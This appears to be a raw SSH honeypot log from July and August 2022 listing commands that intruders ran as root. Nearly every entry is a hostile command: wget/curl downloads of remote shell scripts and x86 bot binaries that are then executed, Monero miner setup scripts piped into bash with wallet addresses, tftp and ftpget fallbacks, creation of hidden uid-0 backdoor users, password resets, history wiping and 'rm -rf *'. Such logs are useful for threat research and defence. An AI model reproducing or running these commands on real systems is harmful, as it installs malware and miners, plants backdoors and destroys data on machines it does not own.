./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B
> /dev/null
history -c

From 62.197.136.10 1-Jul-2022 01:06:48 ssh2 root
Exec wget 62.197.136.157/x-8.6-.Sakura; chmod 777 x-8.6-.Sakura; ./x-8.6-.Sakura x86_64
wget 62.197.136.157/x-8.6-.Sakura
chmod 777 x-8.6-.Sakura
./x-8.6-.Sakura x86_64

From 179.43.142.180 1-Jul-2022 15:33:22 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h; sudo hive-passwd ij24ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h
sudo hive-passwd ij24ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 179.43.142.180 1-Jul-2022 15:42:28 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h; sudo hive-passwd ij24ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34ghij45h
sudo hive-passwd ij24ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 65.21.236.179 3-Jul-2022 12:16:59 ssh2 root
Exec cd /tmp ; wget http://51.210.71.115/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O http://51.210.71.115/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget http://51.210.71.115/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O http://51.210.71.115/ok.sh
sh ok.sh
rm -rf ok.sh
history -c

From 179.43.142.180 3-Jul-2022 13:27:48 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h; sudo hive-passwd ij234g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h
sudo hive-passwd ij234g4ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 179.43.142.180 3-Jul-2022 13:41:51 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h; sudo hive-passwd ij234g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34ghij45h
sudo hive-passwd ij234g4ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 179.43.154.185 4-Jul-2022 23:25:43 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP

From 179.43.142.180 5-Jul-2022 05:45:38 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h; sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h
sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 179.43.142.180 5-Jul-2022 16:54:14 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h; sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh23gij45h
sudo hive-passwd ij234g23g4ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 179.43.154.185 5-Jul-2022 21:41:14 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP

From 179.43.142.180 5-Jul-2022 23:16:31 ssh2 root
Exec sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh233g4gij45h; sudo hive-passwd ij2g4334g23g4ij34gg34gg5ghgij45h; sudo pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set 2i4gij234ghji3534g4jiggg34g34gh233g4gij45h
sudo hive-passwd ij2g4334g23g4ij34gg34gg5ghgij45h
sudo pkill Xorg
sudo pkill x11vnc
uname -a

From 221.1.223.60 6-Jul-2022 01:11:15 ssh2 root
Exec cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a
cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c
uname -a

From 178.62.101.117 8-Jul-2022 10:04:28 ssh2 root
Exec uptime
uptime

From 13.126.186.24 11-Jul-2022 17:53:07 ssh2 root
Exec echo -n 21tc59fr|md5sum;uname -a
echo -n 21tc59fr|md5sum
uname -a

From 81.177.126.60 12-Jul-2022 20:29:20 ssh2 root
Exec cat /proc/1
cat /proc/1

From 82.165.236.132 13-Jul-2022 09:15:59 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
ls

From 193.105.134.95 13-Jul-2022 09:16:47 ssh2 root
cd /var/www
ls
locate
apt-get
apt-get install mlocate
locate www
mlocate

From 64.27.7.88 14-Jul-2022 17:08:39 ssh2 root
ls
w
free -g
yum
apt
/usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234
/usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root
passwd r00t
passwd .test
passwd root
exit

From 141.98.6.76 15-Jul-2022 21:36:03 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g411g3334gji3jirg; sudo hive-passwd ij24gji33g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g411g3334gji3jirg
sudo hive-passwd ij24gji33g34i4jhgji345hji5h

From 141.98.6.76 15-Jul-2022 22:31:14 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g411g3334gji3jirg; sudo hive-passwd ij24gji33g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g411g3334gji3jirg
sudo hive-passwd ij24gji33g34i4jhgji345hji5h

From 141.98.6.76 16-Jul-2022 03:24:01 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji3jirg; sudo hive-passwd ij4i33g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji3jirg
sudo hive-passwd ij4i33g34i4jhgji345hji5h

From 141.98.6.76 16-Jul-2022 05:40:26 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji3jirg; sudo hive-passwd ij4i33g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji3jirg
sudo hive-passwd ij4i33g34i4jhgji345hji5h

From 190.90.156.90 16-Jul-2022 07:23:48 ssh2 root
Exec cat /etc/os-release
cat /etc/os-release

From 45.14.192.10 17-Jul-2022 07:21:36 ssh2 root
Exec cd /tmp ; wget 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 141.95.188.153/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 141.95.188.153/ok.sh
sh ok.sh
rm -rf ok.sh
history -c

From 141.98.6.76 18-Jul-2022 05:02:30 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji34g3jirg; sudo hive-passwd ij4i33g34g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji34g3jirg
sudo hive-passwd ij4i33g34g34i4jhgji345hji5h

From 141.98.6.76 18-Jul-2022 14:30:45 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji34g3jirg; sudo hive-passwd ij4i33g34g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji34g3jirg
sudo hive-passwd ij4i33g34g34i4jhgji345hji5h

From 141.98.6.76 18-Jul-2022 20:18:45 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji34g334gjirg; sudo hive-passwd ij4i33g33g344g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji34g334gjirg
sudo hive-passwd ij4i33g33g344g34i4jhgji345hji5h

From 163.30.32.11 19-Jul-2022 01:28:26 ssh2 root
Exec echo -n ub5g98o0|md5sum;uname -a
echo -n ub5g98o0|md5sum
uname -a

From 141.98.6.76 19-Jul-2022 06:42:43 ssh2 root
Exec uname -a; sudo hive-passwd set d353rh34g44gji34g334ggjirg; sudo hive-passwd gi33g344g34i4jhgji345hji5h
uname -a
sudo hive-passwd set d353rh34g44gji34g334ggjirg
sudo hive-passwd gi33g344g34i4jhgji345hji5h

From 222.186.42.99 20-Jul-2022 05:28:28 ssh2 root
Exec uname -s -m
uname -s -m

From 58.229.13.59 20-Jul-2022 12:03:12 ssh2 root
Exec uname -a;nproc;history -c
uname -a
nproc
history -c

From 81.161.229.98 20-Jul-2022 19:57:51 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24ghij34hgij34jihi1j546t; sudo hive-passwd 3ji14ghij34hji34h5ij34ij5h
uname -a
sudo hive-passwd set i3j24ghij34hgij34jihi1j546t
sudo hive-passwd 3ji14ghij34hji34h5ij34ij5h

From 121.201.73.78 21-Jul-2022 02:01:11 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN

From 121.201.73.78 21-Jul-2022 02:01:19 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN

From 81.161.229.98 21-Jul-2022 17:39:08 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24ghi23gi1j546t; sudo hive-passwd 3ji14324g34h5ij34ij5h
uname -a
sudo hive-passwd set i3j24ghi23gi1j546t
sudo hive-passwd 3ji14324g34h5ij34ij5h

From 159.203.96.251 22-Jul-2022 09:27:27 ssh2 root
Exec nproc ; uname -a
nproc
uname -a

From 205.185.118.213 22-Jul-2022 13:25:00 ssh2 root
Exec cat /etc/passwd
cat /etc/passwd

From 205.185.118.213 22-Jul-2022 13:25:01 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 208.67.106.145 23-Jul-2022 13:16:05 ssh2 root
Exec wget 208.67.106.115/bins/x86; chmod 777 x86; ./x86 wns.x86
wget 208.67.106.115/bins/x86
chmod 777 x86
./x86 wns.x86

From 208.67.106.145 23-Jul-2022 22:57:25 ssh2 root
Exec wget 208.67.106.115/bins/x86; chmod 777 x86; ./x86 wns.x86
wget 208.67.106.115/bins/x86
chmod 777 x86
./x86 wns.x86

From 81.161.229.98 25-Jul-2022 14:31:48 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24ghi23g23gi1j546t; sudo hive-passwd 3ji14324g332g4h5ij34ij5h
uname -a
sudo hive-passwd set i3j24ghi23g23gi1j546t
sudo hive-passwd 3ji14324g332g4h5ij34ij5h

From 81.161.229.98 25-Jul-2022 19:37:28 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24ghi23g23gi1j546t; sudo hive-passwd 3ji14324g332g4h5ij34ij5h
uname -a
sudo hive-passwd set i3j24ghi23g23gi1j546t
sudo hive-passwd 3ji14324g332g4h5ij34ij5h

From 81.161.229.98 26-Jul-2022 08:04:03 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24gh34g546t; sudo hive-passwd 3ji14334g2g4h5ij34ij5h
uname -a
sudo hive-passwd set i3j24gh34g546t
sudo hive-passwd 3ji14334g2g4h5ij34ij5h

From 81.161.229.98 27-Jul-2022 05:15:57 ssh2 root
Exec uname -a; sudo hive-passwd set i3j24gh34g3232gg546t; sudo hive-passwd 3ji23g4h5ij34ij5h
uname -a
sudo hive-passwd set i3j24gh34g3232gg546t
sudo hive-passwd 3ji23g4h5ij34ij5h

From 54.37.80.220 27-Jul-2022 21:22:36 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.167.32/catvsdog.sh; curl -O http://45.145.167.32/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 45.145.167.32 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 45.145.167.32; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.167.32 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.167.32/catvsdog.sh
curl -O http://45.145.167.32/catvsdog.sh
chmod 777 catvsdog.sh
sh catvsdog.sh
tftp 45.145.167.32 -c get 0xt984767.sh
chmod 777 catvsdog.sh
sh catvsdog.sh
tftp -r catvsdog.sh -g 45.145.167.32
chmod 777 catvsdog.sh
sh catvsdog.sh
ftpget -v -u anonymous -p anonymous -P 21 45.145.167.32 catvsdog.sh catvsdog.sh
sh catvsdog.sh
rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh
rm -rf *

From 45.95.55.41 28-Jul-2022 13:45:13 ssh2 root
Exec cd /tmp; rm -rf 86; wget http://107.189.8.111/x86_64; curl -O http://107.189.8.111/x86_64; chmod 777 x86_64; ./x86_64 x86; rm -rf *
cd /tmp
rm -rf 86
wget http://107.189.8.111/x86_64
curl -O http://107.189.8.111/x86_64
chmod 777 x86_64
./x86_64 x86
rm -rf *

From 205.185.118.213 28-Jul-2022 20:24:18 ssh2 root
Exec cat /etc/passwd
cat /etc/passwd

From 205.185.118.213 28-Jul-2022 20:24:21 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 45.95.55.48 30-Jul-2022 20:24:30 ssh2 root
Exec cd /tmp; rm -rf 86; wget http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; curl -O http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; chmod 777 infn.x86; ./infn.x86 x86; rm -rf *
cd /tmp
rm -rf 86
wget http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86
curl -O http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86
chmod 777 infn.x86
./infn.x86 x86
rm -rf *

From 91.80.138.240 3-Aug-2022 18:05:52 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 91.80.138.240 3-Aug-2022 18:08:59 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 91.80.138.240 3-Aug-2022 18:12:36 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 159.89.44.77 5-Aug-2022 05:54:21 ssh2 root
Exec nproc ; uname -a
nproc
uname -a

From 82.165.236.132 5-Aug-2022 09:19:58 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
export HISTFILESIZE=0
useradd home -ou 0 -g 0
ls

From 82.165.236.132 5-Aug-2022 10:26:01 ssh2 root
w
clear
history -c
ls
ps ax
whereis sendmail

From 104.236.174.101 6-Aug-2022 06:42:00 ssh2 root
Exec pwd
pwd

From 82.165.236.132 6-Aug-2022 12:55:00 ssh2 root
apt-get install postfix
/etc/init.d/postfix restart
yum install postfix
apt-get update

From 188.166.45.125 6-Aug-2022 16:24:33 ssh2 root
Exec uname -a;nproc;lspci | grep -i --color 'VGA\|3d\|2d'
uname -a
nproc
lspci | grep -i --color 'VGA\|3d\|2d'

From 195.3.147.55 7-Aug-2022 09:26:40 ssh2 root
ifconfig
cat /etc/hosts
apt-get update
apt-get upgrade
apt-get
sudo apt-get update
sudo apt update
apt update

From 208.67.106.95 8-Aug-2022 01:34:03 ssh2 root
Exec yum install wget -y; apt install wget -y; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.67/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 208.67.104.67 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
yum install wget -y
apt install wget -y
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.67.104.67/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 208.67.104.67 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 208.67.106.95 8-Aug-2022 02:15:56 ssh2 root
Exec yum install wget -y; apt install wget -y; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.67/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 208.67.104.67 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
yum install wget -y
apt install wget -y
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.67.104.67/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 208.67.104.67 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 34.105.136.202 10-Aug-2022 00:06:07 ssh2 root
Exec cd /tmp; rm -rf *; wget http://109.206.241.211/mrrow.sh; curl -O http://109.206.241.211/mrrow.sh; chmod 777 mrrow.sh; sh mrrow.sh
cd /tmp
rm -rf *
wget http://109.206.241.211/mrrow.sh
curl -O http://109.206.241.211/mrrow.sh
chmod 777 mrrow.sh
sh mrrow.sh

From 34.73.55.61 10-Aug-2022 01:46:58 ssh2 root
Exec cd /tmp; rm -rf *; wget http://109.206.241.211/mrrow.sh; curl -O http://109.206.241.211/mrrow.sh; chmod 777 mrrow.sh; sh mrrow.sh
cd /tmp
rm -rf *
wget http://109.206.241.211/mrrow.sh
curl -O http://109.206.241.211/mrrow.sh
chmod 777 mrrow.sh
sh mrrow.sh

From 195.178.120.113 10-Aug-2022 07:15:54 ssh2 root
Exec wget 208.67.106.145/bns/qlcxvisgod.x86; chmod 777 qlcxvisgod.x86; ./qlcxvisgod.x86 wns.x86
wget 208.67.106.145/bns/qlcxvisgod.x86
chmod 777 qlcxvisgod.x86
./qlcxvisgod.x86 wns.x86

From 194.36.191.93 10-Aug-2022 22:40:01 ssh2 root
Exec wget
wget

From 39.115.13.221 11-Aug-2022 08:31:17 ssh2 root
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)

From 34.69.171.232 12-Aug-2022 00:24:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.115.101/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 205.185.115.101 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 205.185.115.101; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.115.101 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.115.101/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 205.185.115.101 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 205.185.115.101
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.115.101 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 159.203.66.114 12-Aug-2022 08:59:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.94/SBIDIOT/x86 -O /tmp/; chmod +x /tmp/; /tmp/x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.67.104.94/SBIDIOT/x86 -O /tmp/
chmod +x /tmp/
/tmp/x86

From 118.27.6.132 13-Aug-2022 12:04:50 ssh2 root
Exec uname -a;nproc;history -c
uname -a
nproc
history -c

From 141.98.11.92 13-Aug-2022 15:43:41 ssh2 root
Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox0\nxoxox0" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
rm -rf *
cd /tmp
rm -rf *
pkill xmrig
echo -e "xoxox0\nxoxox0" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 141.98.11.92 14-Aug-2022 01:37:45 ssh2 root
Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox0\nxoxox0" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
rm -rf *
cd /tmp
rm -rf *
pkill xmrig
echo -e "xoxox0\nxoxox0" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 208.67.104.67 14-Aug-2022 08:45:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.219/phantom.sh; curl -O http://109.206.241.219/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; tftp 109.206.241.219 -c get phantom.sh; chmod 777 phantom.sh; sh phantom.sh; tftp -r phantom2.sh -g 109.206.241.219; chmod 777 phantom2.sh; sh phantom2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.219 phantom1.sh phantom1.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.206.241.219/phantom.sh
curl -O http://109.206.241.219/phantom.sh
chmod 777 phantom.sh
sh phantom.sh
tftp 109.206.241.219 -c get phantom.sh
chmod 777 phantom.sh
sh phantom.sh
tftp -r phantom2.sh -g 109.206.241.219
chmod 777 phantom2.sh
sh phantom2.sh
ftpget -v -u anonymous -p anonymous -P 21 109.206.241.219 phantom1.sh phantom1.sh
sh phantom1.sh
rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh
rm -rf *

From 45.80.30.17 15-Aug-2022 08:42:24 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime

From 156.210.14.65 16-Aug-2022 04:29:17 ssh2 root
Exec cat /proc/1
cat /proc/1

From 141.98.11.92 17-Aug-2022 01:04:57 ssh2 root
Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox1\nxoxox1" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
rm -rf *
cd /tmp
rm -rf *
pkill xmrig
echo -e "xoxox1\nxoxox1" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 141.98.11.92 17-Aug-2022 08:21:17 ssh2 root
